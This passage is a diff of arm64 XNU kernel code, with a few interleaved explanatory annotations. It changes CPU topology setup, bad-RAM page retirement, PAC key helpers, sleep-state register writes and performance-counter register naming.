        /* update deferred_ipi_timer_ns with the new clamped value */
        absolutetime_to_nanoseconds(abstime, &deferred_ipi_timer_ns);
 
-       MSR(ARM64_REG_IPI_CR, abstime);
+       MSR("S3_5_C15_C3_1", abstime);
 #else
        (void)nanosecs;
        panic("Platform does not support ACC Fast IPI");
@@ -494,6 +494,7 @@ machine_processor_shutdown(
        return Shutdown_context(doshutdown, processor);
 }
 
+
 /*
  *      Routine:        ml_init_lock_timeout
  *      Function:
@@ -531,6 +532,8 @@ ml_init_lock_timeout(void)
        }
        MutexSpin = abstime;
        low_MutexSpin = MutexSpin;
+
+
        /*
         * high_MutexSpin should be initialized as low_MutexSpin * real_ncpus, but
         * real_ncpus is not set at this time
@@ -543,6 +546,17 @@ ml_init_lock_timeout(void)
        nanoseconds_to_absolutetime(MAX_WFE_HINT_INTERVAL_US * NSEC_PER_USEC, &ml_wfe_hint_max_interval);
 }
 
+/*
+ * This is called when all of the ml_processor_info_t structures have been
+ * initialized and all the processors have been started through processor_start().
+ *
+ * Required by the scheduler subsystem.
+ */
+void
+ml_cpu_init_completed(void)
+{
+}
+
 /*
  * This is called from the machine-independent routine cpu_up()
  * to perform machine-dependent info updates.
@@ -822,29 +836,6 @@ ml_read_chip_revision(unsigned int *rev __unused)
 #endif
 }
 
-static boolean_t
-ml_parse_interrupt_prop(const DTEntry entry, ml_topology_cpu_t *cpu)
-{
-       uint32_t const *prop;
-       unsigned int propSize;
-
-       if (SecureDTGetProperty(entry, "interrupts", (void const **)&prop, &propSize) != kSuccess) {
-               return FALSE;
-       }
-
-       if (propSize == sizeof(uint32_t) * 1) {
-               cpu->pmi_irq = prop[0];
-               return TRUE;
-       } else if (propSize == sizeof(uint32_t) * 3) {
-               cpu->self_ipi_irq = prop[0];
-               cpu->pmi_irq = prop[1];
-               cpu->other_ipi_irq = prop[2];
-               return TRUE;
-       } else {
-               return FALSE;
-       }
-}
-
 void
 ml_parse_cpu_topology(void)
 {
@@ -903,7 +894,6 @@ ml_parse_cpu_topology(void)
                cpu->l3_cache_size = (uint32_t)ml_readprop(child, "l3-cache-size", 0);
                cpu->l3_cache_id = (uint32_t)ml_readprop(child, "l3-cache-id", 0);
 
-               ml_parse_interrupt_prop(child, cpu);
                ml_read_reg_range(child, "cpu-uttdbg-reg", &cpu->cpu_UTTDBG_pa, &cpu->cpu_UTTDBG_len);
                ml_read_reg_range(child, "cpu-impl-reg", &cpu->cpu_IMPL_pa, &cpu->cpu_IMPL_len);
                ml_read_reg_range(child, "coresight-reg", &cpu->coresight_pa, &cpu->coresight_len);
@@ -1231,7 +1221,43 @@ ml_processor_register(ml_processor_info_t *in_processor_info,
        this_cpu_datap->cluster_master = is_boot_cpu;
 #endif /* HAS_CLUSTER */
 
+#if !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2)
+       {
+               /* Workaround for the existing scheduler
+                * code, which only supports a limited number of psets.
+                *
+                * To get around that limitation, we distribute all cores into
+                * two psets according to their cluster type, instead of
+                * having a dedicated pset per cluster ID.
+                */
+
+               pset_cluster_type_t pset_cluster_type;
+
+               /* For this workaround, we don't expect to see anything
+                * other than E or P clusters. */
+               switch (in_processor_info->cluster_type) {
+               case CLUSTER_TYPE_E:
+                       pset_cluster_type = PSET_AMP_E;
+                       break;
+               case CLUSTER_TYPE_P:
+                       pset_cluster_type = PSET_AMP_P;
+                       break;
+               default:
+                       panic("unknown/unsupported cluster type %d", in_processor_info->cluster_type);
+               }
+
+               pset = pset_find_first_by_cluster_type(pset_cluster_type);
+
+               if (pset == NULL) {
+                       panic("no pset for cluster type %d/%d", in_processor_info->cluster_type, pset_cluster_type);
+               }
+
+               kprintf("%s>chosen pset with cluster id %d cluster type %d for core:\n",
+                   __FUNCTION__, pset->pset_cluster_id, pset->pset_cluster_type);
+       }
+#else /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */
        pset = pset_find(in_processor_info->cluster_id, processor_pset(master_processor));
+#endif /* !defined(RC_HIDE_XNU_FIRESTORM) && (MAX_CPU_CLUSTERS > 2) */
 
        assert(pset != NULL);
        kprintf("%s>cpu_id %p cluster_id %d cpu_number %d is type %d\n", __FUNCTION__, in_processor_info->cpu_id, in_processor_info->cluster_id, this_cpu_datap->cpu_number, in_processor_info->cluster_type);
@@ -1560,12 +1586,25 @@ ml_static_protect(
 void
 ml_static_mfree(
        vm_offset_t vaddr,
-       vm_size_t size)
+       vm_size_t   size)
 {
-       vm_offset_t     vaddr_cur;
-       ppnum_t         ppn;
-       uint32_t freed_pages = 0;
-       uint32_t freed_kernelcache_pages = 0;
+       vm_offset_t vaddr_cur;
+       ppnum_t     ppn;
+       uint32_t    freed_pages = 0;
+       uint32_t    bad_page_cnt = 0;
+       uint32_t    freed_kernelcache_pages = 0;
+
+#if defined(__arm64__) && (DEVELOPMENT || DEBUG)
+       /* Test hook for simulating a bad RAM page */
+       static int count = 0;
+       static int bad_at_cnt = -1;
+       static bool first = true;
+
+       if (first) {
+               (void)PE_parse_boot_argn("bad_static_mfree", &bad_at_cnt, sizeof(bad_at_cnt));
+               first = false;
+       }
+#endif /* defined(__arm64__) && (DEVELOPMENT || DEBUG) */
 
        /* It is acceptable (if bad) to fail to free. */
        if (vaddr < VM_MIN_KERNEL_ADDRESS) {
@@ -1589,6 +1628,19 @@ ml_static_mfree(
                                panic("Failed ml_static_mfree on %p", (void *) vaddr_cur);
                        }
 
+#if defined(__arm64__)
+                       bool is_bad = pmap_is_bad_ram(ppn);
+#if DEVELOPMENT || DEBUG
+                       is_bad |= (count++ == bad_at_cnt);
+#endif /* DEVELOPMENT || DEBUG */
+
+                       if (is_bad) {
+                               ++bad_page_cnt;
+                               vm_page_create_retired(ppn);
+                               continue;
+                       }
+#endif /* defined(__arm64__) */
+
                        vm_page_create(ppn, (ppn + 1));
                        freed_pages++;
                        if (vaddr_cur >= segLOWEST && vaddr_cur < end_kern) {
@@ -1602,7 +1654,7 @@ ml_static_mfree(
        vm_page_kernelcache_count -= freed_kernelcache_pages;
        vm_page_unlock_queues();
 #if     DEBUG
-       kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn);
+       kprintf("ml_static_mfree: Released 0x%x pages at VA %p, size:0x%llx, last ppn: 0x%x, +%d bad\n", freed_pages, (void *)vaddr, (uint64_t)size, ppn, bad_page_cnt);
 #endif
 }
 
@@ -1888,7 +1940,7 @@ cache_trap_error(thread_t thread, vm_map_address_t fault_addr)
 }
 
 static void
-cache_trap_recover()
+cache_trap_recover(void)
 {
        vm_map_address_t fault_addr;
 
@@ -1901,7 +1953,8 @@ static void
 set_cache_trap_recover(thread_t thread)
 {
 #if defined(HAS_APPLE_PAC)
-       thread->recover = (vm_address_t)ptrauth_auth_and_resign(&cache_trap_recover,
+       void *fun = &cache_trap_recover;
+       thread->recover = (vm_address_t)ptrauth_auth_and_resign(fun,
            ptrauth_key_function_pointer, 0,
            ptrauth_key_function_pointer, ptrauth_blend_discriminator(&thread->recover, PAC_DISCRIMINATOR_RECOVER));
 #else /* defined(HAS_APPLE_PAC) */
index 5c88ab5c4b6aa4ea28fe7a0802207e9e142f5216..f1f0da4370c192948de6d0c9d9ed7134a0971ccb 100644 (file)
 #include "assym.s"
 
 
+#if defined(HAS_APPLE_PAC)
+
+
+.macro LOAD_CPU_JOP_KEY        dst, tmp
+       mrs             \tmp, TPIDR_EL1
+       ldr             \tmp, [\tmp, ACT_CPUDATAP]
+       ldr             \dst, [\tmp, CPU_JOP_KEY]
+.endmacro
+
+/*
+ * uint64_t ml_enable_user_jop_key(uint64_t user_jop_key)
+ */
+       .align 2
+       .globl EXT(ml_enable_user_jop_key)
+LEXT(ml_enable_user_jop_key)
+
+/*
+ * void ml_disable_user_jop_key(uint64_t user_jop_key, uint64_t saved_jop_state)
+ */
+       .align 2
+       .globl EXT(ml_disable_user_jop_key)
+LEXT(ml_disable_user_jop_key)
+
+#endif /* defined(HAS_APPLE_PAC) */
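The HAS_APPLE_PAC block above declares ml_enable_user_jop_key() and ml_disable_user_jop_key() with their C prototypes in comments; the assembly bodies are elided from the public sources. A hedged usage sketch based only on those prototypes (the caller, the key source, and the work in between are hypothetical):

/*
 * Hypothetical bracket around work that must run with the user's JOP key.
 * Assumes only the prototypes commented above; not part of this change.
 */
static void
with_user_jop_key_example(uint64_t user_jop_key)
{
	uint64_t saved_jop_state = ml_enable_user_jop_key(user_jop_key);
	/* ... operate on pointers signed with the user's JOP key ... */
	ml_disable_user_jop_key(user_jop_key, saved_jop_state);
}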
 
 #if HAS_BP_RET
 
@@ -53,11 +77,11 @@ LEXT(set_bp_ret)
        add             x14, x14, EXT(bp_ret)@pageoff
        ldr             w14, [x14]
 
-       mrs             x13, ARM64_REG_ACC_CFG
+       mrs             x13, CPU_CFG
        and             x13, x13, (~(ARM64_REG_ACC_CFG_bpSlp_mask << ARM64_REG_ACC_CFG_bpSlp_shift))
        and             x14, x14, #(ARM64_REG_ACC_CFG_bpSlp_mask)
        orr             x13, x13, x14, lsl #(ARM64_REG_ACC_CFG_bpSlp_shift)
-       msr             ARM64_REG_ACC_CFG, x13
+       msr             CPU_CFG, x13
 
        ret
 #endif // HAS_BP_RET
@@ -72,8 +96,8 @@ LEXT(set_nex_pg)
        cbz             x14, Lnex_pg_done
 
        // Set the SEG-recommended value of 12 additional reset cycles
-       HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13
-       HID_SET_BITS ARM64_REG_HID14, ARM64_REG_HID14_NexPwgEn, x13
+       HID_INSERT_BITS HID13, ARM64_REG_HID13_RstCyc_mask, ARM64_REG_HID13_RstCyc_val, x13
+       HID_SET_BITS HID14, ARM64_REG_HID14_NexPwgEn, x13
 
 Lnex_pg_done:
        ret
@@ -190,7 +214,7 @@ LEXT(set_mmu_ttb_alternate)
 #else
 #if defined(HAS_VMSA_LOCK)
 #if DEBUG || DEVELOPMENT
-       mrs             x1, ARM64_REG_VMSA_LOCK_EL1
+       mrs             x1, VMSA_LOCK_EL1
        and             x1, x1, #(VMSA_LOCK_TTBR1_EL1)
        cbnz            x1, L_set_locked_reg_panic
 #endif /* DEBUG || DEVELOPMENT */
@@ -265,7 +289,7 @@ LEXT(vmsa_lock)
        mov x0, #(VMSA_LOCK_TTBR1_EL1 | VMSA_LOCK_TCR_EL1 | VMSA_LOCK_VBAR_EL1)
 #endif
        orr x0, x0, x1
-       msr ARM64_REG_VMSA_LOCK_EL1, x0
+       msr VMSA_LOCK_EL1, x0
        isb sy
        ret
 #endif /* defined(HAS_VMSA_LOCK) */
@@ -293,7 +317,7 @@ LEXT(set_tcr)
 #if defined(HAS_VMSA_LOCK)
 #if DEBUG || DEVELOPMENT
        // assert TCR unlocked
-       mrs             x1, ARM64_REG_VMSA_LOCK_EL1
+       mrs             x1, VMSA_LOCK_EL1
        and             x1, x1, #(VMSA_LOCK_TCR_EL1)
        cbnz            x1, L_set_locked_reg_panic
 #endif /* DEBUG || DEVELOPMENT */
@@ -730,7 +754,7 @@ LEXT(arm64_prepare_for_sleep)
 
 #if defined(APPLETYPHOON)
        // <rdar://problem/15827409>
-       HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9
+       HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x9
        dsb             sy
        isb             sy
 #endif
@@ -738,11 +762,11 @@ LEXT(arm64_prepare_for_sleep)
 #if HAS_CLUSTER
        cbnz            x0, 1f                                      // Skip if deep_sleep == true
        // Mask FIQ and IRQ to avoid spurious wakeups
-       mrs             x9, ARM64_REG_CYC_OVRD
+       mrs             x9, CPU_OVRD
        and             x9, x9, #(~(ARM64_REG_CYC_OVRD_irq_mask | ARM64_REG_CYC_OVRD_fiq_mask))
        mov             x10, #(ARM64_REG_CYC_OVRD_irq_disable | ARM64_REG_CYC_OVRD_fiq_disable)
        orr             x9, x9, x10
-       msr             ARM64_REG_CYC_OVRD, x9
+       msr             CPU_OVRD, x9
        isb
 1:
 #endif
@@ -750,7 +774,7 @@ LEXT(arm64_prepare_for_sleep)
        cbz             x0, 1f                                          // Skip if deep_sleep == false
 #if __ARM_GLOBAL_SLEEP_BIT__
        // Enable deep sleep
-       mrs             x1, ARM64_REG_ACC_OVRD
+       mrs             x1, ACC_OVRD
        orr             x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep)
        and             x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask))
        orr             x1, x1, #(  ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep)
@@ -763,23 +787,40 @@ LEXT(arm64_prepare_for_sleep)
 #if HAS_RETENTION_STATE
        orr             x1, x1, #(ARM64_REG_ACC_OVRD_disPioOnWfiCpu)
 #endif
-       msr             ARM64_REG_ACC_OVRD, x1
+       msr             ACC_OVRD, x1
 
+#if defined(APPLEMONSOON)
+       // Skye has an ACC_OVRD register for EBLK and PBLK. Same bitfield layout for these bits
+       mrs             x1, EBLK_OVRD
+       orr             x1, x1, #(ARM64_REG_ACC_OVRD_enDeepSleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnSRM_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_ok2PwrDnSRM_deepsleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2TrDnLnk_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_ok2TrDnLnk_deepsleep)
+       and             x1, x1, #(~(ARM64_REG_ACC_OVRD_ok2PwrDnCPM_mask))
+       orr             x1, x1, #(  ARM64_REG_ACC_OVRD_ok2PwrDnCPM_deepsleep)
+       msr             EBLK_OVRD, x1
+
+#endif
 
 #else
+#if defined(APPLETYPHOON) || defined(APPLETWISTER)
        // Enable deep sleep
        mov             x1, ARM64_REG_CYC_CFG_deepSleep
-       msr             ARM64_REG_CYC_CFG, x1
+       msr             CPU_CFG, x1
+#endif
 #endif
 
 1:
        // Set "OK to power down" (<rdar://problem/12390433>)
-       mrs             x9, ARM64_REG_CYC_OVRD
+       mrs             x9, CPU_OVRD
        orr             x9, x9, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_down)
 #if HAS_RETENTION_STATE
        orr             x9, x9, #(ARM64_REG_CYC_OVRD_disWfiRetn)
 #endif
-       msr             ARM64_REG_CYC_OVRD, x9
+       msr             CPU_OVRD, x9
 
 #if defined(APPLEMONSOON) || defined(APPLEVORTEX)
        ARM64_IS_PCORE x9
@@ -802,12 +843,12 @@ LEXT(arm64_prepare_for_sleep)
        mrs x9, MIDR_EL1
        EXEC_COREALL_REVLO CPU_VERSION_B0, x9, x10
 #endif
-       mrs             x9, ARM64_REG_HID10
+       mrs             x9, HID10
        orr             x9, x9, #(ARM64_REG_HID10_DisHwpGups)
-       msr             ARM64_REG_HID10, x9
+       msr             HID10, x9
        isb             sy
        and             x9, x9, #(~(ARM64_REG_HID10_DisHwpGups))
-       msr             ARM64_REG_HID10, x9
+       msr             HID10, x9
        isb             sy
 #endif
        EXEC_END
@@ -829,9 +870,9 @@ LEXT(arm64_force_wfi_clock_gate)
        ARM64_STACK_PROLOG
        PUSH_FRAME
 
-       mrs             x0, ARM64_REG_CYC_OVRD
+       mrs             x0, CPU_OVRD
        orr             x0, x0, #(ARM64_REG_CYC_OVRD_ok2pwrdn_force_up)
-       msr             ARM64_REG_CYC_OVRD, x0
+       msr             CPU_OVRD, x0
        
        POP_FRAME
        ARM64_STACK_EPILOG
@@ -863,7 +904,7 @@ LEXT(typhoon_prepare_for_wfi)
        PUSH_FRAME
 
        // <rdar://problem/15827409>
-       HID_SET_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
+       HID_SET_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
        dsb             sy
        isb             sy
 
@@ -878,7 +919,7 @@ LEXT(typhoon_return_from_wfi)
        PUSH_FRAME
 
        // <rdar://problem/15827409>
-       HID_CLEAR_BITS ARM64_REG_HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
+       HID_CLEAR_BITS HID2, ARM64_REG_HID2_disMMUmtlbPrefetch, x0
        dsb             sy
        isb             sy 
 
@@ -923,57 +964,57 @@ LEXT(cpu_defeatures_set)
        cmp             x0, #1
        b.ne            cpu_defeatures_set_ret
        LOAD_UINT64     x1, HID0_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID0
+       mrs             x0, HID0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID0, x0
+       msr             HID0, x0
        LOAD_UINT64     x1, HID1_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID1
+       mrs             x0, HID1
        orr             x0, x0, x1
-       msr             ARM64_REG_HID1, x0
+       msr             HID1, x0
        LOAD_UINT64     x1, HID2_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID2
+       mrs             x0, HID2
        orr             x0, x0, x1
-       msr             ARM64_REG_HID2, x0
+       msr             HID2, x0
        LOAD_UINT64     x1, HID3_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID3
+       mrs             x0, HID3
        orr             x0, x0, x1
-       msr             ARM64_REG_HID3, x0
+       msr             HID3, x0
        LOAD_UINT64     x1, HID4_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID4
+       mrs             x0, S3_0_C15_C4_0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID4, x0
+       msr             S3_0_C15_C4_0, x0
        LOAD_UINT64     x1, HID7_DEFEATURES_1
-       mrs             x0, ARM64_REG_HID7
+       mrs             x0, HID7
        orr             x0, x0, x1
-       msr             ARM64_REG_HID7, x0
+       msr             HID7, x0
        dsb             sy
        isb             sy 
        b               cpu_defeatures_set_ret
 cpu_defeatures_set_2:
        LOAD_UINT64     x1, HID0_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID0
+       mrs             x0, HID0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID0, x0
+       msr             HID0, x0
        LOAD_UINT64     x1, HID1_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID1
+       mrs             x0, HID1
        orr             x0, x0, x1
-       msr             ARM64_REG_HID1, x0
+       msr             HID1, x0
        LOAD_UINT64     x1, HID2_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID2
+       mrs             x0, HID2
        orr             x0, x0, x1
-       msr             ARM64_REG_HID2, x0
+       msr             HID2, x0
        LOAD_UINT64     x1, HID3_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID3
+       mrs             x0, HID3
        orr             x0, x0, x1
-       msr             ARM64_REG_HID3, x0
+       msr             HID3, x0
        LOAD_UINT64     x1, HID4_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID4
+       mrs             x0, S3_0_C15_C4_0
        orr             x0, x0, x1
-       msr             ARM64_REG_HID4, x0
+       msr             S3_0_C15_C4_0, x0
        LOAD_UINT64     x1, HID7_DEFEATURES_2
-       mrs             x0, ARM64_REG_HID7
+       mrs             x0, HID7
        orr             x0, x0, x1
-       msr             ARM64_REG_HID7, x0
+       msr             HID7, x0
        dsb             sy
        isb             sy 
        b               cpu_defeatures_set_ret
index cd62e333adbd8e3fe2175bc45d2bcd6d5393ce1c..d12abcc6f65c18ccc7991525fa99c77196c1369d 100644 (file)
@@ -65,15 +65,12 @@ __END_DECLS
 
 __BEGIN_DECLS
 
-#define PMCR0 "s3_1_c15_c0_0"
-
 /* set by hardware if a PMI was delivered */
 #define PMCR0_PMAI (UINT64_C(1) << 11)
 #define PMCR0_PMI(REG) ((REG) & PMCR0_PMAI)
 
 #if HAS_UNCORE_CTRS
 
-#define UPMSR "s3_7_c15_c6_4"
 #define UPMSR_PMI(REG) ((REG) & 0x1)
 
 #endif /* HAS_UNCORE_CTRS */
@@ -82,20 +79,20 @@ static inline bool
 mt_pmi_pending(uint64_t * restrict pmcr0_out,
     uint64_t * restrict upmsr_out)
 {
-       uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1");
        bool pmi = PMCR0_PMI(pmcr0);
        if (pmi) {
                /*
                 * Acknowledge the PMI by clearing the pmai bit.
                 */
-               __builtin_arm_wsr64(PMCR0, pmcr0 & ~PMCR0_PMAI);
+               __builtin_arm_wsr64("PMCR0_EL1", pmcr0 & ~PMCR0_PMAI);
        }
        *pmcr0_out = pmcr0;
 
 #if HAS_UNCORE_CTRS
        extern bool mt_uncore_enabled;
        if (mt_uncore_enabled) {
-               uint64_t upmsr = __builtin_arm_rsr64(UPMSR);
+               uint64_t upmsr = __builtin_arm_rsr64("UPMSR_EL1");
                if (UPMSR_PMI(upmsr)) {
                        pmi = true;
                }
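In this header the hard-coded encoding strings (removed above) are replaced by architectural-style names passed straight to the ACLE move builtins; either way the register is just a string argument to __builtin_arm_rsr64()/__builtin_arm_wsr64(). A small sketch of the assumed equivalence, inferred from the deleted #define PMCR0 "s3_1_c15_c0_0":

/* Assumed-equivalent spellings of the same implementation-defined register:
 * "PMCR0_EL1" is the name used after this change; "s3_1_c15_c0_0" is the
 * encoding the removed #define expanded to. */
static inline uint64_t
read_pmcr0_by_name(void)
{
	return __builtin_arm_rsr64("PMCR0_EL1");
}

static inline uint64_t
read_pmcr0_by_encoding(void)
{
	return __builtin_arm_rsr64("s3_1_c15_c0_0");
}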
index 8cf48ad7010ec4f503eb977549c8666d0360a0b4..06d845f8f3332d2dec334560c06000fb3863f630 100644 (file)
@@ -78,22 +78,10 @@ static const ml_topology_info_t *topology_info;
  *
  * PMC2+ are currently handled by kpc.
  */
-
-#define PMC0 "s3_2_c15_c0_0"
-#define PMC1 "s3_2_c15_c1_0"
-#define PMC2 "s3_2_c15_c2_0"
-#define PMC3 "s3_2_c15_c3_0"
-#define PMC4 "s3_2_c15_c4_0"
-#define PMC5 "s3_2_c15_c5_0"
-#define PMC6 "s3_2_c15_c6_0"
-#define PMC7 "s3_2_c15_c7_0"
-
 #define PMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \
     X(6, A); X(7, A)
 
 #if CORE_NCTRS > 8
-#define PMC8 "s3_2_c15_c9_0"
-#define PMC9 "s3_2_c15_c10_0"
 #define PMC_8_9(X, A) X(8, A); X(9, A)
 #else // CORE_NCTRS > 8
 #define PMC_8_9(X, A)
@@ -167,9 +155,6 @@ enum {
 /*
  * PMCR1 controls which execution modes count events.
  */
-
-#define PMCR1 "s3_1_c15_c1_0"
-
 #define PMCR1_EL0A32_EN(CTR) (UINT64_C(1) << (0 + CTR_POS(CTR)))
 #define PMCR1_EL0A64_EN(CTR) (UINT64_C(1) << (8 + CTR_POS(CTR)))
 #define PMCR1_EL1A64_EN(CTR) (UINT64_C(1) << (16 + CTR_POS(CTR)))
@@ -190,30 +175,13 @@ core_init_execution_modes(void)
 {
        uint64_t pmcr1;
 
-       pmcr1 = __builtin_arm_rsr64(PMCR1);
+       pmcr1 = __builtin_arm_rsr64("PMCR1_EL1");
        pmcr1 |= PMCR1_INIT;
-       __builtin_arm_wsr64(PMCR1, pmcr1);
+       __builtin_arm_wsr64("PMCR1_EL1", pmcr1);
 }
 
-/*
- * PMCR2 controls watchpoint registers.
- *
- * PMCR3 controls breakpoints and address matching.
- *
- * PMCR4 controls opcode matching.
- */
-
-#define PMCR2 "s3_1_c15_c2_0"
-#define PMCR3 "s3_1_c15_c3_0"
-#define PMCR4 "s3_1_c15_c4_0"
-
-#define PMSR "s3_1_c15_c13_0"
-
 #define PMSR_OVF(CTR) (1ULL << (CTR))
 
-#define PMESR0 "S3_1_c15_c5_0"
-#define PMESR1 "S3_1_c15_c6_0"
-
 static int
 core_init(__unused mt_device_t dev)
 {
@@ -231,7 +199,7 @@ uint64_t
 mt_core_snap(unsigned int ctr)
 {
        switch (ctr) {
-#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(PMC ## CTR)
+#define PMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(PMC ## CTR))
                PMC_ALL(PMC_RD, 0);
 #undef PMC_RD
        default:
@@ -245,10 +213,10 @@ mt_core_set_snap(unsigned int ctr, uint64_t count)
 {
        switch (ctr) {
        case 0:
-               __builtin_arm_wsr64(PMC0, count);
+               __builtin_arm_wsr64("PMC0", count);
                break;
        case 1:
-               __builtin_arm_wsr64(PMC1, count);
+               __builtin_arm_wsr64("PMC1", count);
                break;
        default:
                panic("monotonic: invalid core counter %u write %llu", ctr, count);
@@ -259,7 +227,7 @@ mt_core_set_snap(unsigned int ctr, uint64_t count)
 static void
 core_set_enabled(void)
 {
-       uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1");
        pmcr0 |= PMCR0_INIT | PMCR0_FIXED_EN;
 
        if (kpc_get_running() & KPC_CLASS_CONFIGURABLE_MASK) {
@@ -275,12 +243,12 @@ core_set_enabled(void)
                pmcr0 |= kpc_ctrs;
        }
 
-       __builtin_arm_wsr64(PMCR0, pmcr0);
+       __builtin_arm_wsr64("PMCR0_EL1", pmcr0);
 #if MACH_ASSERT
        /*
         * Only check for the values that were ORed in.
         */
-       uint64_t pmcr0_check = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0_check = __builtin_arm_rsr64("PMCR0_EL1");
        if ((pmcr0_check & (PMCR0_INIT | PMCR0_FIXED_EN)) != (PMCR0_INIT | PMCR0_FIXED_EN)) {
                panic("monotonic: hardware ignored enable (read %llx, wrote %llx)",
                    pmcr0_check, pmcr0);
@@ -295,18 +263,18 @@ core_idle(__unused cpu_data_t *cpu)
        assert(ml_get_interrupts_enabled() == FALSE);
 
 #if DEBUG
-       uint64_t pmcr0 = __builtin_arm_rsr64(PMCR0);
+       uint64_t pmcr0 = __builtin_arm_rsr64("PMCR0_EL1");
        if ((pmcr0 & PMCR0_FIXED_EN) == 0) {
                panic("monotonic: counters disabled before idling, pmcr0 = 0x%llx\n", pmcr0);
        }
-       uint64_t pmcr1 = __builtin_arm_rsr64(PMCR1);
+       uint64_t pmcr1 = __builtin_arm_rsr64("PMCR1_EL1");
        if ((pmcr1 & PMCR1_INIT) == 0) {
                panic("monotonic: counter modes disabled before idling, pmcr1 = 0x%llx\n", pmcr1);
        }
 #endif /* DEBUG */
 
        /* disable counters before updating */
-       __builtin_arm_wsr64(PMCR0, PMCR0_INIT);
+       __builtin_arm_wsr64("PMCR0_EL1", PMCR0_INIT);
 
        mt_update_fixed_counts();
 }
@@ -348,7 +316,6 @@ static uintptr_t cpm_impl[MAX_NMONITORS] = {};
 #define UPMSR_OVF(R, CTR) ((R) >> ((CTR) + UPMSR_OVF_POS) & 0x1)
 #define UPMSR_OVF_MASK    (((UINT64_C(1) << UNCORE_NCTRS) - 1) << UPMSR_OVF_POS)
 
-#define UPMPCM "s3_7_c15_c5_4"
 #define UPMPCM_CORE(ID) (UINT64_C(1) << (ID))
 
 /*
@@ -488,8 +455,7 @@ uncmon_set_counting_locked_l(__unused unsigned int monid, uint64_t enctrmask)
         * UPMCR0 controls which counters are enabled and how interrupts are generated
         * for overflows.
         */
-#define UPMCR0 "s3_7_c15_c0_4"
-       __builtin_arm_wsr64(UPMCR0, UPMCR0_INIT | enctrmask);
+       __builtin_arm_wsr64("UPMCR0_EL1", UPMCR0_INIT | enctrmask);
 }
 
 #if UNCORE_PER_CLUSTER
@@ -519,25 +485,6 @@ uncmon_set_counting_locked_r(unsigned int monid, uint64_t enctrmask)
  * would be indexing into an array of strings.
  */
 
-#define UPMC0 "s3_7_c15_c7_4"
-#define UPMC1 "s3_7_c15_c8_4"
-#define UPMC2 "s3_7_c15_c9_4"
-#define UPMC3 "s3_7_c15_c10_4"
-#define UPMC4 "s3_7_c15_c11_4"
-#define UPMC5 "s3_7_c15_c12_4"
-#define UPMC6 "s3_7_c15_c13_4"
-#define UPMC7 "s3_7_c15_c14_4"
-#if UNCORE_NCTRS > 8
-#define UPMC8  "s3_7_c15_c0_5"
-#define UPMC9  "s3_7_c15_c1_5"
-#define UPMC10 "s3_7_c15_c2_5"
-#define UPMC11 "s3_7_c15_c3_5"
-#define UPMC12 "s3_7_c15_c4_5"
-#define UPMC13 "s3_7_c15_c5_5"
-#define UPMC14 "s3_7_c15_c6_5"
-#define UPMC15 "s3_7_c15_c7_5"
-#endif /* UNCORE_NCTRS > 8 */
-
 #define UPMC_0_7(X, A) X(0, A); X(1, A); X(2, A); X(3, A); X(4, A); X(5, A); \
                X(6, A); X(7, A)
 #if UNCORE_NCTRS <= 8
@@ -553,7 +500,7 @@ uncmon_read_counter_locked_l(__unused unsigned int monid, unsigned int ctr)
 {
        assert(ctr < UNCORE_NCTRS);
        switch (ctr) {
-#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(UPMC ## CTR)
+#define UPMC_RD(CTR, UNUSED) case (CTR): return __builtin_arm_rsr64(__MSR_STR(UPMC ## CTR))
                UPMC_ALL(UPMC_RD, 0);
 #undef UPMC_RD
        default:
@@ -570,7 +517,7 @@ uncmon_write_counter_locked_l(__unused unsigned int monid, unsigned int ctr,
        assert(ctr < UNCORE_NCTRS);
        switch (ctr) {
 #define UPMC_WR(CTR, COUNT) case (CTR): \
-               return __builtin_arm_wsr64(UPMC ## CTR, (COUNT))
+               return __builtin_arm_wsr64(__MSR_STR(UPMC ## CTR), (COUNT))
